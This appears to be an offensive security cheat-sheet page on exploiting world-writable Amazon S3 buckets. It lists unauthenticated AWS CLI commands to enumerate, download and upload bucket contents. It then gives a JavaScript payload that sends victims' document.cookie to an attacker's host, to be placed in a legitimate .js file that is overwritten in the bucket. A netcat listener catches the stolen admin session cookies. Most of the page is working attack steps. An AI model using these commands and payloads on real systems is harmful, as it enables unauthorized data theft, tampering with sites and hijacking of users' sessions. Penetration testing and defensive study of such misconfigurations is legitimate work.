World-Writable S3 Buckets

World-Writable S3 Buckets Exploitation

Steps and commands

1) Create a directory to possibly download all assets within the bucket locally

mkdir TARGET_BUCKET_NAME; cd TARGET_BUCKET_NAME/

2) List all content of the bucket recursively WITHOUT authentication

aws s3 ls s3://BUCKET_NAME-BUCKET_ID --recursive --no-sign-request

3) Download all bucket contents at your current directory

aws s3 cp s3://BUCKET_NAME-BUCKET_ID . --recursive --no-sign-request

4) Check for misconfigured bucket ACLs. This is optional

aws s3api get-bucket-acl --bucket BUCKET_NAME-BUCKET_ID --no-sign-request

5) Likewise for file ACLs

aws s3api get-object-acl --bucket BUCKET_NAME-BUCKET_ID --key EXAMPLE/FILE.TXT --no-sign-request

6) Go to a directory of our downloaded bucket content

cd EXAMPLE/

7) Create a test file to test for World-Writable Access in the bucket

echo test > test

8) Upload our test file to the bucket

aws s3 cp test s3://BUCKET_NAME-BUCKET_ID/EXAMPLE/test --no-sign-request

9) Verify that our file has been uploaded successfully

aws s3 cp test s3://BUCKET_NAME-BUCKET_ID/EXAMPLE/test - --no-sign-request

Alternate method to check for world read/writeable S3 Buckets: AWS macie2

aws macie2 describe-buckets --region REGION  --criteria '{"publicAccess.effectivePermission":{"eq":["PUBLIC"]}}' --query 'buckets[*].{BucketName: bucketName, AllowsPublicReadAccess: publicAccess.permissionConfiguration.bucketLevelPermissions.bucketPolicy.allowsPublicReadAccess, AllowsPublicWriteAccess: publicAccess.permissionConfiguration.bucketLevelPermissions.bucketPolicy.allowsPublicWriteAccess}' --output table

If we have verified that we can actually write arbitrary files on a bucket, and the webapp has pages that can only be accessed by privileged users, we can steal their session cookies by overwriting a legitimate .js file with our own malicious code.

Code:

var xhr=new XMLHttpRequest();

xhr.open("GET", "http://localhost:8000/?"+document.cookie, true); 

xhr.send();

Backup the .js file first

cp legit.js legit.js.bak

Place this payload before the legitimate contents of the file. Don't forget to change localhost with your corresponding IP address

Then upload the file to the bucket

aws s3 cp legit.js s3://BUCKET_NAME-BUCKET_ID/example/legit.js --no-sign-request

nc -lvnp 8000

PreviousAWS -SSM - Command Execution NextIdentity Access Management (IAM)

Last updated 7 months ago

hashtagWorld-Writable S3 Buckets Exploitation

hashtagSteps and commands

hashtagAlternate method to check for world read/writeable S3 Buckets: AWS macie2

hashtagUse case example: Steal admin cookie

hashtagIf we have verified that we can actually write arbitrary files on a bucket, and the webapp has pages that can only be accessed by privileged users, we can steal their session cookies by overwriting a legitimate .js file with our own malicious code.

hashtagCode:

hashtagBackup the .js file first

hashtagPlace this payload before the legitimate contents of the file. Don't forget to change localhost with your corresponding IP address

hashtagThen upload the file to the bucket

hashtagSetup listener to fetch the cookie if the webapp uses automation, or an admin somehow triggers our payload